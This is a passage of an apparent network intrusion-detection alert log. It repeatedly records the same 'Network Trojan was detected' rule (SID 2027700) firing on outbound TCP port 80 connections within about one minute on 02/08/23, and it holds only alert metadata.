                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449772802027700 02/08/23-21:31:37.016273
                            SID:2027700
                            Source Port:49772
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449916802027700 02/08/23-21:32:17.326423
                            SID:2027700
                            Source Port:49916
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449950802027700 02/08/23-21:32:25.900036
                            SID:2027700
                            Source Port:49950
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449763802027700 02/08/23-21:31:31.780351
                            SID:2027700
                            Source Port:49763
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449852802027700 02/08/23-21:31:59.185304
                            SID:2027700
                            Source Port:49852
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449941802027700 02/08/23-21:32:23.532205
                            SID:2027700
                            Source Port:49941
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449925802027700 02/08/23-21:32:19.523158
                            SID:2027700
                            Source Port:49925
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449922802027700 02/08/23-21:32:18.772895
                            SID:2027700
                            Source Port:49922
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449738802027700 02/08/23-21:31:25.612828
                            SID:2027700
                            Source Port:49738
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449836802027700 02/08/23-21:31:53.163923
                            SID:2027700
                            Source Port:49836
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449827802027700 02/08/23-21:31:50.529167
                            SID:2027700
                            Source Port:49827
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449833802027700 02/08/23-21:31:51.983787
                            SID:2027700
                            Source Port:49833
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449931802027700 02/08/23-21:32:21.032345
                            SID:2027700
                            Source Port:49931
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449744802027700 02/08/23-21:31:27.200875
                            SID:2027700
                            Source Port:49744
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449747802027700 02/08/23-21:31:27.935502
                            SID:2027700
                            Source Port:49747
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449919802027700 02/08/23-21:32:18.035543
                            SID:2027700
                            Source Port:49919
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449794802027700 02/08/23-21:31:42.450951
                            SID:2027700
                            Source Port:49794
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449880802027700 02/08/23-21:32:05.941168
                            SID:2027700
                            Source Port:49880
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449750802027700 02/08/23-21:31:28.669505
                            SID:2027700
                            Source Port:49750
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449791802027700 02/08/23-21:31:41.723772
                            SID:2027700
                            Source Port:49791
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449785802027700 02/08/23-21:31:40.215518
                            SID:2027700
                            Source Port:49785
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449874802027700 02/08/23-21:32:04.500033
                            SID:2027700
                            Source Port:49874
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449963802027700 02/08/23-21:32:29.504401
                            SID:2027700
                            Source Port:49963
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449814802027700 02/08/23-21:31:47.295499
                            SID:2027700
                            Source Port:49814
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449849802027700 02/08/23-21:31:58.454915
                            SID:2027700
                            Source Port:49849
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449725802027700 02/08/23-21:31:22.403677
                            SID:2027700
                            Source Port:49725
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449938802027700 02/08/23-21:32:22.819598
                            SID:2027700
                            Source Port:49938
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449903802027700 02/08/23-21:32:11.766469
                            SID:2027700
                            Source Port:49903
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449855802027700 02/08/23-21:31:59.888895
                            SID:2027700
                            Source Port:49855
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449944802027700 02/08/23-21:32:24.249933
                            SID:2027700
                            Source Port:49944
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449808802027700 02/08/23-21:31:45.869321
                            SID:2027700
                            Source Port:49808
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449766802027700 02/08/23-21:31:32.973144
                            SID:2027700
                            Source Port:49766
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449719802027700 02/08/23-21:31:17.030553
                            SID:2027700
                            Source Port:49719
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449939802027700 02/08/23-21:32:23.062857
                            SID:2027700
                            Source Port:49939
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449731802027700 02/08/23-21:31:23.865413
                            SID:2027700
                            Source Port:49731
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449746802027700 02/08/23-21:31:27.686672
                            SID:2027700
                            Source Port:49746
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449844802027700 02/08/23-21:31:57.262976
                            SID:2027700
                            Source Port:49844
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449942802027700 02/08/23-21:32:23.769179
                            SID:2027700
                            Source Port:49942
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449792802027700 02/08/23-21:31:41.968819
                            SID:2027700
                            Source Port:49792
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449890802027700 02/08/23-21:32:08.343447
                            SID:2027700
                            Source Port:49890
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449703802027700 02/08/23-21:31:09.854969
                            SID:2027700
                            Source Port:49703
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449774802027700 02/08/23-21:31:37.538022
                            SID:2027700
                            Source Port:49774
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449872802027700 02/08/23-21:32:04.015502
                            SID:2027700
                            Source Port:49872
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449801802027700 02/08/23-21:31:44.140311
                            SID:2027700
                            Source Port:49801
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449859802027700 02/08/23-21:32:00.842850
                            SID:2027700
                            Source Port:49859
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449957802027700 02/08/23-21:32:27.889281
                            SID:2027700
                            Source Port:49957
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449779802027700 02/08/23-21:31:38.749643
                            SID:2027700
                            Source Port:49779
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449877802027700 02/08/23-21:32:05.223019
                            SID:2027700
                            Source Port:49877
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449952802027700 02/08/23-21:32:26.521263
                            SID:2027700
                            Source Port:49952
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449756802027700 02/08/23-21:31:30.104619
                            SID:2027700
                            Source Port:49756
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449816802027700 02/08/23-21:31:47.785160
                            SID:2027700
                            Source Port:49816
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449929802027700 02/08/23-21:32:20.553590
                            SID:2027700
                            Source Port:49929
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449834802027700 02/08/23-21:31:52.577365
                            SID:2027700
                            Source Port:49834
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449741802027700 02/08/23-21:31:26.473669
                            SID:2027700
                            Source Port:49741
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449869802027700 02/08/23-21:32:03.296837
                            SID:2027700
                            Source Port:49869
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449960802027700 02/08/23-21:32:28.668791
                            SID:2027700
                            Source Port:49960
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449782802027700 02/08/23-21:31:39.471649
                            SID:2027700
                            Source Port:49782
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449764802027700 02/08/23-21:31:32.057321
                            SID:2027700
                            Source Port:49764
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449811802027700 02/08/23-21:31:46.576529
                            SID:2027700
                            Source Port:49811
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449887802027700 02/08/23-21:32:07.638708
                            SID:2027700
                            Source Port:49887
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449924802027700 02/08/23-21:32:19.271281
                            SID:2027700
                            Source Port:49924
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449769802027700 02/08/23-21:31:34.756431
                            SID:2027700
                            Source Port:49769
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449906802027700 02/08/23-21:32:12.698779
                            SID:2027700
                            Source Port:49906
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449728802027700 02/08/23-21:31:23.125330
                            SID:2027700
                            Source Port:49728
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449882802027700 02/08/23-21:32:06.440098
                            SID:2027700
                            Source Port:49882
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449947802027700 02/08/23-21:32:25.015743
                            SID:2027700
                            Source Port:49947
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449965802027700 02/08/23-21:32:30.025255
                            SID:2027700
                            Source Port:49965
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449904802027700 02/08/23-21:32:12.046729
                            SID:2027700
                            Source Port:49904
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449711802027700 02/08/23-21:31:11.882854
                            SID:2027700
                            Source Port:49711
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449867802027700 02/08/23-21:32:02.794106
                            SID:2027700
                            Source Port:49867
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449864802027700 02/08/23-21:32:02.060206
                            SID:2027700
                            Source Port:49864
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449962802027700 02/08/23-21:32:29.257081
                            SID:2027700
                            Source Port:49962
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449705802027700 02/08/23-21:31:10.447077
                            SID:2027700
                            Source Port:49705
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449818802027700 02/08/23-21:31:48.341113
                            SID:2027700
                            Source Port:49818
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449959802027700 02/08/23-21:32:28.422447
                            SID:2027700
                            Source Port:49959
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449870802027700 02/08/23-21:32:03.546238
                            SID:2027700
                            Source Port:49870
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449726802027700 02/08/23-21:31:22.634931
                            SID:2027700
                            Source Port:49726
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449821802027700 02/08/23-21:31:49.045771
                            SID:2027700
                            Source Port:49821
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449824802027700 02/08/23-21:31:49.780553
                            SID:2027700
                            Source Port:49824
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449754802027700 02/08/23-21:31:29.621347
                            SID:2027700
                            Source Port:49754
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449751802027700 02/08/23-21:31:28.918585
                            SID:2027700
                            Source Port:49751
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449895802027700 02/08/23-21:32:09.563402
                            SID:2027700
                            Source Port:49895
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449934802027700 02/08/23-21:32:21.786854
                            SID:2027700
                            Source Port:49934
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449937802027700 02/08/23-21:32:22.552019
                            SID:2027700
                            Source Port:49937
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449892802027700 02/08/23-21:32:08.821841
                            SID:2027700
                            Source Port:49892
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449839802027700 02/08/23-21:31:55.963337
                            SID:2027700
                            Source Port:49839
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449797802027700 02/08/23-21:31:43.170405
                            SID:2027700
                            Source Port:49797
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449854802027700 02/08/23-21:31:59.659125
                            SID:2027700
                            Source Port:49854
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449721802027700 02/08/23-21:31:17.546135
                            SID:2027700
                            Source Port:49721
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449940802027700 02/08/23-21:32:23.296032
                            SID:2027700
                            Source Port:49940
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449889802027700 02/08/23-21:32:08.107631
                            SID:2027700
                            Source Port:49889
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449718802027700 02/08/23-21:31:15.921504
                            SID:2027700
                            Source Port:49718
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449759802027700 02/08/23-21:31:30.808118
                            SID:2027700
                            Source Port:49759
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449932802027700 02/08/23-21:32:21.312523
                            SID:2027700
                            Source Port:49932
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449926802027700 02/08/23-21:32:19.767739
                            SID:2027700
                            Source Port:49926
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449713802027700 02/08/23-21:31:12.783643
                            SID:2027700
                            Source Port:49713
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449897802027700 02/08/23-21:32:10.032773
                            SID:2027700
                            Source Port:49897
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449967802027700 02/08/23-21:32:30.528686
                            SID:2027700
                            Source Port:49967
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449790802027700 02/08/23-21:31:41.465182
                            SID:2027700
                            Source Port:49790
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449862802027700 02/08/23-21:32:01.593618
                            SID:2027700
                            Source Port:49862
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449789802027700 02/08/23-21:31:41.224340
                            SID:2027700
                            Source Port:49789
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449748802027700 02/08/23-21:31:28.171578
                            SID:2027700
                            Source Port:49748
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449784802027700 02/08/23-21:31:39.982751
                            SID:2027700
                            Source Port:49784
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449826802027700 02/08/23-21:31:50.292455
                            SID:2027700
                            Source Port:49826
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449909802027700 02/08/23-21:32:14.933906
                            SID:2027700
                            Source Port:49909
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449832802027700 02/08/23-21:31:51.751305
                            SID:2027700
                            Source Port:49832
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449743802027700 02/08/23-21:31:26.963197
                            SID:2027700
                            Source Port:49743
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449930802027700 02/08/23-21:32:20.796642
                            SID:2027700
                            Source Port:49930
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449838802027700 02/08/23-21:31:54.373776
                            SID:2027700
                            Source Port:49838
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449936802027700 02/08/23-21:32:22.307700
                            SID:2027700
                            Source Port:49936
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449927802027700 02/08/23-21:32:20.024415
                            SID:2027700
                            Source Port:49927
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449829802027700 02/08/23-21:31:51.027291
                            SID:2027700
                            Source Port:49829
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449945802027700 02/08/23-21:32:24.485227
                            SID:2027700
                            Source Port:49945
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449856802027700 02/08/23-21:32:00.132402
                            SID:2027700
                            Source Port:49856
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449749802027700 02/08/23-21:31:28.419020
                            SID:2027700
                            Source Port:49749
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449847802027700 02/08/23-21:31:57.967039
                            SID:2027700
                            Source Port:49847
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449758802027700 02/08/23-21:31:30.574106
                            SID:2027700
                            Source Port:49758
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449786802027700 02/08/23-21:31:40.457663
                            SID:2027700
                            Source Port:49786
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449767802027700 02/08/23-21:31:33.408799
                            SID:2027700
                            Source Port:49767
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449875802027700 02/08/23-21:32:04.746050
                            SID:2027700
                            Source Port:49875
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449780802027700 02/08/23-21:31:38.981621
                            SID:2027700
                            Source Port:49780
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449710802027700 02/08/23-21:31:11.651177
                            SID:2027700
                            Source Port:49710
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449860802027700 02/08/23-21:32:01.115035
                            SID:2027700
                            Source Port:49860
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449911802027700 02/08/23-21:32:16.121219
                            SID:2027700
                            Source Port:49911
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449813802027700 02/08/23-21:31:47.049281
                            SID:2027700
                            Source Port:49813
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449902802027700 02/08/23-21:32:11.276709
                            SID:2027700
                            Source Port:49902
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449771802027700 02/08/23-21:31:36.658549
                            SID:2027700
                            Source Port:49771
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449822802027700 02/08/23-21:31:49.295197
                            SID:2027700
                            Source Port:49822
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449733802027700 02/08/23-21:31:24.349655
                            SID:2027700
                            Source Port:49733
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449946802027700 02/08/23-21:32:24.773081
                            SID:2027700
                            Source Port:49946
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449857802027700 02/08/23-21:32:00.376328
                            SID:2027700
                            Source Port:49857
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449898802027700 02/08/23-21:32:10.281507
                            SID:2027700
                            Source Port:49898
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449768802027700 02/08/23-21:31:33.720032
                            SID:2027700
                            Source Port:49768
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449964802027700 02/08/23-21:32:29.755518
                            SID:2027700
                            Source Port:49964
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449739802027700 02/08/23-21:31:25.862579
                            SID:2027700
                            Source Port:49739
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449828802027700 02/08/23-21:31:50.782978
                            SID:2027700
                            Source Port:49828
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449917802027700 02/08/23-21:32:17.561486
                            SID:2027700
                            Source Port:49917
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449894802027700 02/08/23-21:32:09.316597
                            SID:2027700
                            Source Port:49894
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449918802027700 02/08/23-21:32:17.798708
                            SID:2027700
                            Source Port:49918
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449770802027700 02/08/23-21:31:35.698493
                            SID:2027700
                            Source Port:49770
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449787802027700 02/08/23-21:31:40.714503
                            SID:2027700
                            Source Port:49787
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449752802027700 02/08/23-21:31:29.152515
                            SID:2027700
                            Source Port:49752
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449841802027700 02/08/23-21:31:56.501984
                            SID:2027700
                            Source Port:49841
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449901802027700 02/08/23-21:32:11.021221
                            SID:2027700
                            Source Port:49901
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449968802027700 02/08/23-21:32:30.770420
                            SID:2027700
                            Source Port:49968
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449806802027700 02/08/23-21:31:45.331321
                            SID:2027700
                            Source Port:49806
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449812802027700 02/08/23-21:31:46.808504
                            SID:2027700
                            Source Port:49812
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449714802027700 02/08/23-21:31:13.211259
                            SID:2027700
                            Source Port:49714
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449803802027700 02/08/23-21:31:44.620668
                            SID:2027700
                            Source Port:49803
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449879802027700 02/08/23-21:32:05.692639
                            SID:2027700
                            Source Port:49879
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449708802027700 02/08/23-21:31:11.181341
                            SID:2027700
                            Source Port:49708
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
